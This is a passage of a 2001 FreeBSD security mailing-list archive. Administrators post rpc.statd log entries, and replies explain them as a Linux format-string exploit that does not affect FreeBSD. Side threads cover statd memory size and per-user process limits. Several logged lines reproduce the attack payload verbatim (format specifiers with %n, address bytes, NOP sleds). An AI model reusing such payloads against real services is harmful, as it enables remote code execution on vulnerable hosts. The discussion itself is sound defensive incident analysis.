PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P Jan 16 19:04:16 troutmask /boot/kernel/kernel: ^PM-^PM-^PM-^P Jan 17 20:35:09 troutmask rpc.statd: invalid hostname to sm_stat: ^X=F7=FF= =BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF^[=F7= =FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P Jan 17 20:35:09 troutmask /boot/kernel/kernel: ^PM-^PM-^PM-^P Jan 20 21:11:04 troutmask rpc.statd: invalid hostname to sm_stat: ^X=F7=FF= =BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF^[=F7= =FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P Jan 20 21:11:04 troutmask /boot/kernel/kernel: ^PM-^PM-^PM-^P Jan 21 16:16:21 troutmask rpc.statd: invalid hostname to sm_stat: ^X=F7=FF= =BF^X=F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF^[=F7= =FF=BF%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-= ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM= -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P= M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P Jan 21 16:16:22 troutmask /boot/kernel/kernel: ^PM-^PM-^PM-^P --ELM980443599-65671-0_-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9:31:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id F3A5B37B69F for ; Thu, 25 Jan 2001 09:31:23 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1501) id E8ABE1360C; Thu, 25 Jan 2001 12:31:20 -0500 (EST) Date: Thu, 25 Jan 2001 12:31:20 -0500 From: Chris Faulhaber To: "Steven G. Kargl" Cc: freebsd-security@freebsd.org Subject: Re: buffer overflows in rpc.statd? Message-ID: <20010125123120.A60926@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , "Steven G. Kargl" , freebsd-security@freebsd.org References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101251726.f0PHQei65827@troutmask.apl.washington.edu>; from kargl@troutmask.apl.washington.edu on Thu, Jan 25, 2001 at 09:26:39AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 09:26:39AM -0800, Steven G. Kargl wrote: > Are there any known compromises of rpc.statd that involve > buffer overflows? I have several entries in /var/log/messages that > look suspicious, but I currently don't know what these entries > mean (see attachment). The suspicious entries appear to be > buffers that someone or something has tried to overflow. > No, someone is trying to use a Linux rpc.statd exploit on your box, to which the BSD's were never vulnerable (see previous posts on this topic for more info). -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9:32: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id BB9EE37B6A0 for ; Thu, 25 Jan 2001 09:31:48 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f0PHVlG22248; Thu, 25 Jan 2001 09:31:47 -0800 (PST) Date: Thu, 25 Jan 2001 09:31:47 -0800 From: Alfred Perlstein To: "Steven G. Kargl" Cc: freebsd-security@FreeBSD.ORG Subject: Re: buffer overflows in rpc.statd? Message-ID: <20010125093147.M26076@fw.wintelcom.net> References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200101251726.f0PHQei65827@troutmask.apl.washington.edu>; from kargl@troutmask.apl.washington.edu on Thu, Jan 25, 2001 at 09:26:39AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Steven G. Kargl [010125 09:29] wrote: > Are there any known compromises of rpc.statd that involve > buffer overflows? I have several entries in /var/log/messages that > look suspicious, but I currently don't know what these entries > mean (see attachment). The suspicious entries appear to be > buffers that someone or something has tried to overflow. Kiddies running linux exploits against your box. -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9:42: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from gifw.genroco.com (genroco.com [205.254.195.202]) by hub.freebsd.org (Postfix) with ESMTP id 35AAE37B404 for ; Thu, 25 Jan 2001 09:41:33 -0800 (PST) Received: from gi2.genroco.com (IDENT:root@gi2.genroco.com [192.133.120.3]) by gifw.genroco.com (8.9.3/8.9.3) with ESMTP id LAA04301; Thu, 25 Jan 2001 11:41:30 -0600 Received: from scot.genroco.com (scot.genroco.com [192.133.120.125]) by gi2.genroco.com (8.9.3/8.9.3) with SMTP id LAA31473; Thu, 25 Jan 2001 11:41:19 -0600 Message-ID: <024b01c086f6$0cfda480$7d7885c0@genroco.com> From: "Scot W. Hetzel" To: "Steven G. Kargl" , References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> Subject: Re: buffer overflows in rpc.statd? Date: Thu, 25 Jan 2001 11:41:16 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-Mimeole: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: "Steven G. Kargl" > Are there any known compromises of rpc.statd that involve > buffer overflows? I have several entries in /var/log/messages that > look suspicious, but I currently don't know what these entries > mean (see attachment). The suspicious entries appear to be > buffers that someone or something has tried to overflow. > I've been seeing the same thing on a FreeBSD 4.2-STABLE (Dec 23). Anybody have an Ideal as to what this is? Jan 25 03:27:48 spare rpc.statd: invalid hostname to sm_stat: ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7 \x ff\xbf^[\xf7\xff\xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n% 10x%n%192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P Scot To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 9:46:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from gifw.genroco.com (genroco.com [205.254.195.202]) by hub.freebsd.org (Postfix) with ESMTP id A7E4237B6A0 for ; Thu, 25 Jan 2001 09:46:37 -0800 (PST) Received: from gi2.genroco.com (IDENT:root@gi2.genroco.com [192.133.120.3]) by gifw.genroco.com (8.9.3/8.9.3) with ESMTP id LAA04366 for ; Thu, 25 Jan 2001 11:46:36 -0600 Received: from scot.genroco.com (scot.genroco.com [192.133.120.125]) by gi2.genroco.com (8.9.3/8.9.3) with SMTP id LAA31504 for ; Thu, 25 Jan 2001 11:46:35 -0600 Message-ID: <026c01c086f6$c2c151e0$7d7885c0@genroco.com> From: "Scot W. Hetzel" To: References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> <024b01c086f6$0cfda480$7d7885c0@genroco.com> Subject: Re: buffer overflows in rpc.statd? Date: Thu, 25 Jan 2001 11:46:33 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-Mimeole: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: "Scot W. Hetzel" > > Anybody have an Ideal as to what this is? > > Jan 25 03:27:48 spare rpc.statd: invalid hostname to sm_stat: > ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7 > \x Thanks, Chris for letting us know it's a linux exploit. Is there anyway that we can find the IP address of the script kiddie using this exploit so we can inform their ISP. Thanks, Scot To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 10: 6:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id 2B26537B6A5 for ; Thu, 25 Jan 2001 10:06:14 -0800 (PST) Received: (from dlacroix@localhost) by cowpie.acm.vt.edu (8.9.3/8.9.3) id NAA00434; Thu, 25 Jan 2001 13:04:32 -0500 (EST) From: David La Croix Message-Id: <200101251804.NAA00434@cowpie.acm.vt.edu> Subject: Re: buffer overflows in rpc.statd? In-Reply-To: <026c01c086f6$c2c151e0$7d7885c0@genroco.com> from "Scot W. Hetzel" at "Jan 25, 1 11:46:33 am" To: hetzels@westbend.net (Scot W. Hetzel) Date: Thu, 25 Jan 2001 12:04:32 -0600 (CST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I started seeing this kind of activity on my servers beginning around August. I don't specifically log the reports, but looking at the packet refused counters on my IPFW rules, they do continue. I don't know what the consensus is about adding logging of network details about this stuff to rpc.statd, but you can capture logs of any/all network activity you want by adding the "log" directive to a firewall rule. Not sure how much value those logs will be, since there's a significant amount of forged IP headers, source routing, etc espescially among 5kr1pt k1dd135. man ipfw. BTW... not that I know of any specific exploits for Rpc.* family servers, but I would recommend setting up firewall rules to prevent anyone you don't trust from accessing those services (or any other services you might be paranoid about). Even better, make sure your server and clients are behind a firewall that prevents source-routed/forged packets from the outside from spoofing as a part of your lan. > From: "Scot W. Hetzel" > > > > Anybody have an Ideal as to what this is? > > > > Jan 25 03:27:48 spare rpc.statd: invalid hostname to sm_stat: > > > ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7 > > \x > > Thanks, Chris for letting us know it's a linux exploit. > > Is there anyway that we can find the IP address of the script kiddie using > this exploit so we can inform their ISP. > > Thanks, > > Scot > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 10:10:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from h-209-91-79-2.gen.cadvision.com (h-209-91-79-2.gen.cadvision.com [209.91.79.2]) by hub.freebsd.org (Postfix) with ESMTP id A443237B6A5 for ; Thu, 25 Jan 2001 10:10:38 -0800 (PST) Received: from cirp.org (localhost [127.0.0.1]) by h-209-91-79-2.gen.cadvision.com (8.9.3/8.9.3) with ESMTP id LAA04410 for ; Thu, 25 Jan 2001 11:10:26 -0700 (MST) (envelope-from gtf@cirp.org) Message-Id: <200101251810.LAA04410@h-209-91-79-2.gen.cadvision.com> Date: Thu, 25 Jan 2001 11:10:25 -0700 (MST) From: "Geoffrey T. Falk" Subject: rpc.statd bloat To: freebsd-security@freebsd.org In-Reply-To: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> MIME-Version: 1.0 Content-Type: TEXT/plain; CHARSET=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In a related note: Is it normal for rpc.statd to bloat? rpc.statd on boojum, my 4.0-RELEASE box, recently experienced a VSIZE > 274000. This box is an NFS server, but I don't think my NFS client (NEXTSTEP 3.2) is using rpc.statd, because it runs just fine without it. Thanks g. On 25 Jan, Steven G. Kargl wrote: > Are there any known compromises of rpc.statd that involve > buffer overflows? I have several entries in /var/log/messages that > look suspicious, but I currently don't know what these entries > mean (see attachment). The suspicious entries appear to be > buffers that someone or something has tried to overflow. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 10:31:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from thegeneral.hiqinternet.com (unknown [216.166.222.134]) by hub.freebsd.org (Postfix) with ESMTP id 6415637B69B for ; Thu, 25 Jan 2001 10:31:38 -0800 (PST) Received: from 9fzaf (laptop [216.166.222.130]) by thegeneral.hiqinternet.com (8.11.1/8.11.1) with SMTP id f0PIVC002881 for ; Thu, 25 Jan 2001 13:31:12 -0500 (EST) (envelope-from aedwards@hiqinternet.com) From: "Allen Edwards" To: Subject: Newbie Post - Limiting processes Date: Thu, 25 Jan 2001 13:31:42 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Feel free to flame the newbie if he asks an off topic question (great now I'm talking about myself in the 3rd person). Is there a way to limit a user to a certain number of processes? e.g. one foreground and one background process. I am working on providing some shell accounts to a few clients who have requested it and have heard of persons doing this. Sincerely, Allen Edwards To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 10:35:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from joe.pythonvideo.com (joe.pythonvideo.com [209.226.29.94]) by hub.freebsd.org (Postfix) with ESMTP id EBB1837B6B6 for ; Thu, 25 Jan 2001 10:35:24 -0800 (PST) Received: from localhost (joe@localhost) by joe.pythonvideo.com (8.11.1/8.11.0) with ESMTP id f0PIYxo05786; Thu, 25 Jan 2001 13:34:59 -0500 (EST) (envelope-from joe@advancewebhosting.com) X-Authentication-Warning: joe.pythonvideo.com: joe owned process doing -bs Date: Thu, 25 Jan 2001 13:34:58 -0500 (EST) From: Joe Oliveiro X-Sender: joe@joe.pythonvideo.com To: "Steven G. Kargl" Cc: freebsd-security@FreeBSD.ORG Subject: Re: buffer overflows in rpc.statd? In-Reply-To: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Its a RedHat thang, dont worry about fbsd's statd as it isnt prone to those problems. Microsoft: "Where would you like to go to today" Linux: "Where would you like to go tomorrow" FreeBSD: "Hey,when are you guys going to catch up" On Thu, 25 Jan 2001, Steven G. Kargl wrote: > Are there any known compromises of rpc.statd that involve > buffer overflows? I have several entries in /var/log/messages that > look suspicious, but I currently don't know what these entries > mean (see attachment). The suspicious entries appear to be > buffers that someone or something has tried to overflow. > > -- > Steve > http://troutmask.apl.washington.edu/~kargl/ > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11: 6:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by hub.freebsd.org (Postfix) with ESMTP id C711237B6AF for ; Thu, 25 Jan 2001 11:06:06 -0800 (PST) Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.11.0/8.11.0) id f0PJ5uH17573; Thu, 25 Jan 2001 11:05:56 -0800 Date: Thu, 25 Jan 2001 11:05:56 -0800 From: Brooks Davis To: "Geoffrey T. Falk" Cc: freebsd-security@FreeBSD.ORG Subject: Re: rpc.statd bloat Message-ID: <20010125110556.B23406@Odin.AC.HMC.Edu> References: <200101251726.f0PHQei65827@troutmask.apl.washington.edu> <200101251810.LAA04410@h-209-91-79-2.gen.cadvision.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <200101251810.LAA04410@h-209-91-79-2.gen.cadvision.com>; from gtf@cirp.org on Thu, Jan 25, 2001 at 11:10:25AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 11:10:25AM -0700, Geoffrey T. Falk wrote: > In a related note: Is it normal for rpc.statd to bloat? rpc.statd on > boojum, my 4.0-RELEASE box, recently experienced a VSIZE > 274000. > > This box is an NFS server, but I don't think my NFS client (NEXTSTEP > 3.2) is using rpc.statd, because it runs just fine without it. It's not actually consuming any where near that much memory (or at least it shouldn't be). The problem is that it mmaps 256MB of a status file in /var so it can extend the file as needed without having to re-mmap it each time. This looks strange, but really only wastes a bit of address space in the process so it's pretty harmless. -- Brooks -- Any statement of the form "X is the one, true Y" is FALSE. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11:16:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 2DDA937B6AD for ; Thu, 25 Jan 2001 11:15:50 -0800 (PST) Received: (qmail 2040 invoked by uid 1000); 25 Jan 2001 19:14:18 -0000 Date: Thu, 25 Jan 2001 21:14:18 +0200 From: Peter Pentchev To: Allen Edwards Cc: freebsd-security@freebsd.org Subject: Re: Newbie Post - Limiting processes Message-ID: <20010125211418.B1122@ringworld.oblivion.bg> Mail-Followup-To: Allen Edwards , freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from aedwards@hiqinternet.com on Thu, Jan 25, 2001 at 01:31:42PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 01:31:42PM -0500, Allen Edwards wrote: > Feel free to flame the newbie if he asks an off topic question (great now > I'm talking about myself in the 3rd person). > > Is there a way to limit a user to a certain number of processes? e.g. one > foreground and one background process. > > I am working on providing some shell accounts to a few clients who have > requested it and have heard of persons doing this. Well, you can limit the total number of processes a user is allowed to run at any given time, background or foreground alike. Look at the login.conf(5) manpage; you can define a custom login class for your shell users, so that limits are only enforced for them, and not for your privileged admin logins. 'maxproc' is the setting for the total number of processes; I don't think you can control the number of background processes, but if your users happen to run too many of those, they will not even be able to login later :) Actually, *one* foreground process is a bit too much - you need at least one for the shell and one for any program the user might run. Each shell pipe and/or other program fork is one more process. So.. tread lightly :) G'luck, Peter -- I've heard that this sentence is a rumor. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11:23:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 3B86C37B6B0 for ; Thu, 25 Jan 2001 11:23:32 -0800 (PST) Received: (qmail 2098 invoked by uid 1000); 25 Jan 2001 19:22:01 -0000 Date: Thu, 25 Jan 2001 21:22:01 +0200 From: Peter Pentchev To: Allen Edwards Cc: freebsd-security@freebsd.org Subject: Re: Newbie Post - Limiting processes Message-ID: <20010125212201.C1122@ringworld.oblivion.bg> Mail-Followup-To: Allen Edwards , freebsd-security@freebsd.org References: <20010125211418.B1122@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010125211418.B1122@ringworld.oblivion.bg>; from roam@orbitel.bg on Thu, Jan 25, 2001 at 09:14:18PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jan 25, 2001 at 09:14:18PM +0200, Peter Pentchev wrote: > On Thu, Jan 25, 2001 at 01:31:42PM -0500, Allen Edwards wrote: > > Feel free to flame the newbie if he asks an off topic question (great now > > I'm talking about myself in the 3rd person). > > > > Is there a way to limit a user to a certain number of processes? e.g. one > > foreground and one background process. > > > > I am working on providing some shell accounts to a few clients who have > > requested it and have heard of persons doing this. [snip] > Actually, *one* foreground process is a bit too much - you need ..surely 'a bit too STRICT' was what I meant :) > at least one for the shell and one for any program the user might > run. Each shell pipe and/or other program fork is one more process. > So.. tread lightly :) G'luck, Peter -- This inert sentence is my body, but my soul is alive, dancing in the sparks of your brain. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jan 25 11:27: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from thegeneral.hiqinternet.com (unknown [216.166.222.134]) by hub.freebsd.org (Postfix) with ESMTP id 8B9EF37B6B1 for ; Thu, 25 Jan 2001 11:26:48 -0800 (PST) Received: from 9fzaf (laptop [216.166.222.130]) by thegeneral.hiqinternet.com (8.11.1/8.11.1) with SMTP id f0PJQM003060 for ; Thu, 25 Jan 2001 14:26:22 -0500 (EST) (envelope-from aedwards@hiqinternet.com) From: "Allen Edwards" To: Subject: RE: Newbie Post - Limiting processes Date: Thu, 25 Jan 2001 14:26:52 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20010125211418.B1122@ringworld.oblivion.bg> Importance: Normal X-MimeOLE: Produced By 